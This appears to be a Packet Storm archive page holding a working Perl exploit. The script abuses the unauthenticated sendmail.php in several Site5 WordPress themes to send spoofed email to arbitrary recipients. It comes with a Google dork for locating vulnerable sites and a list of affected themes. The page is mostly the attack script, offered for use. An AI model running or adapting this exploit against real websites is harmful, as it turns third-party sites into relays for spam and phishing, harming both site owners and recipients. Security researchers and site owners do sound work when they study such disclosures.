exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Site5 WordPress Theme Email Spoofing

Site5 WordPress Theme Email Spoofing
Posted Jul 15, 2012
Authored by bwall

Multiple Site5 WordPress themes suffer from an email spoofing vulnerability.

tags | exploit, spoof
SHA-256 | 3ae588eeb35bf8ce5278a0e55fc825b27cefdef0759ac73636c048ab0ff52b56

Site5 WordPress Theme Email Spoofing

Change Mirror Download
#!/usr/bin/perl
# Exploit Title: Site5 Wordpress Themes - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Google Dork: "Theme by Site5" -site5.com -site5.net -google.com
# Version: Not Documented
# Tested on: Linux 3.2
use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };

#Change this to the root of the Wordpress
my $wordpress = 'http://localhost/wordpress/';

#Change this to the theme being exploited
#Known Vulnerable Themes: diary, simploblack, simplo, journalcrunch, boldy, webfolio
my $theme = 'diary';

my $url = $wordpress.'wp-content/themes/'.$theme.'/sendmail.php';

#Name shows up in the topic of the email (Website contact message from name)
my $name ='Proof of Concept';

#Sender email address
my $email = 'sender@mail.com';

#Content of the email
my $comment = 'Email content';

#Receiver email address
my $receiver = 'receiver@mail.com';
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close